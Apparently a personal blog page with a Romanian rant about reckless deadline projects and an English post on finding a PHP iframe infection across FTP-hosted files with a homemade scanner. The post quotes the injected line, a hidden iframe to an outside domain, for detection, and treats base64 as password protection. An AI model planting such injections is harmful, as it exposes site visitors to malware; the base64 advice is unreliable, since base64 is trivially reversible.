Nişte chestii simple legate de bun simţ

Când te bagi la un proiect (cu deadline), alege un proiect într-un domeniu în care te pricepi. Dacă vrei totuşi să încerci ceva nou pentru tine, apucă-te din timp.

Când faci pentru prima oară un lucru, îţi ia de cel puţin 2-3 ori mai mult timp decât îţi va lua a doua oară. Cu timpul vei face acelaşi lucru mult mai repede, dar asta numai după ce capeţi experienţă.

Aşa că la planificarea timpului, trebuie să calculezi şi timpul pierdut în plus pentru a te familiariza cu domeniul respectiv, nicidecum nu te apuci cu o saptămână înainte de deadline, când nici un individ cu experienţă nu ar mai avea suficient timp la dispoziţie să termine, nici măcar ceva de calitate mediocră.

Dacă totuşi nu respecţi ce am zis mai devreme, pot să trag concluzia că te crezi ninja şi poţi să faci chestii neobişnuite pentru oamenii de rând, dar atunci de ce strezi pe alţii cu întrebări elementare din domeniul în care te-ai băgat fără să gândeşti şi fără să ştii măcar chestiile elementare?

Când până la urmă o să reuşiţi să realizaţi un căcat proiect care nu reprezintă nici măcar un sfert din ceea ce promiteaţi la început (când vă bateaţi cu pumnul în piept că sunteţi cei mai buni şi puteţi face şi aia si aia), să nu vă aşteptaţi ca toţi să vă laude. În schimb puteţi să vă plângeţi că cei care vă critică sunt doar nişte rataţi. Să facă ei proiectul dacă sunt aşa tari!

De acum încolo o să vă las să va descurcaţi singuri, ninjălăilor!

How to search in files on ftp (remove php infections)

The infection

Recently, my site was infected with some kind of a php virus. My ftp account was broken (brute-force I suppose) so every php file that contains “index” and “main” in filename was modified, and the following line of code was added:

echo “<iframe src=\”http://some-stupid-domain.com/?some-parameter=xx1B10xx\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

So, the effects of this are:

  • some scripts refuse to work (phpmyadmin, phpbb forum login, etc), mostly every script that uses header() function from php
  • I was temporary blacklisted in Google
  • my users were expose to the risk of being infected with malware
  • I got nervous (and I’m usually very calm)
  • I discovered that my hosting company sucks (I cannot upload files with multiple connections because I get block listed by their firewall, but my password can be stolen using brute-force attack, and when this happens is supposed to be only my problem)

The solution

I needed a script to find what file contains malicious code, so I made a php script, that connect through ftp, search and every file and every directory for php files (I’ve tried to find a software for this, but with no results). When a php file is found on ftp, it downloads it, and search if malicious code is found.

Also, when a file is detected as “infected”, the script makes a copy of that file in backup folder, so webmaster can manually check and delete unwanted code. I prefer manually disinfection, because various versions of code was found (a was having links to different domains).

Features:

I know that ftp connection is not something that you can rely on, and the connection will broke after some time. So, the scripts should make some loops to retry every failed command few times before exits. This solution requires more lines of code and the complexity of the algorithm will increase.

To fix this issue, I added a list with already parse files and directories (parsed.txt). When the script find a directory or a file that’s on that list, it ignores it (since is already parsed). This way, you can forcelly stop the script whenever you want and resume it anytime.

Also, a list with infected files will be created (if any infected file is found).

Configuration

Before you can run the script you need to be sure that you modify the ftp server info (server adress, login username and password).

To do this, you need to open find_in_files_on_ftp.php with your favorite code editor (avoid Notepad, please). The lines you need to edit are shown below:

// Configuration
$ftp_server = ‘your_ftp_server’;
$ftp_user = ‘your_ftp_username’;
$ftp_pass = base64_decode(‘password encoded as base64’);
$virus_string = ‘echo “<iframe’; // string to found

I hope that is very clear what every variable means, so I will not discus about them excepting the password. I chose base64 encode for my password, so if someone see it, he can’t remeber it even if it’s common word.

Also, if you want to change the connecting port (default it’s 21), you can manually edit line 19, and replace 21 with you desired port.

Running the script

The script was made and tested on Windows XP, but it should work on every OS that supports PHP. I will test it on linux when I will have some free time.

To run the script on windows you should have php instaled and follow one of the following procedures:

  • Add php/bin folder to PATH variable enviroment, so you can easly run php with “php” command and run find_in_files_on_ftp.bat
  • Right click on find_in_files_on_ftp.php file, and chose Open with and Browse to php.exe

Download

Click on the link bellow to download ( ~2.47kbytes):

find_in_files_on_ftp.zip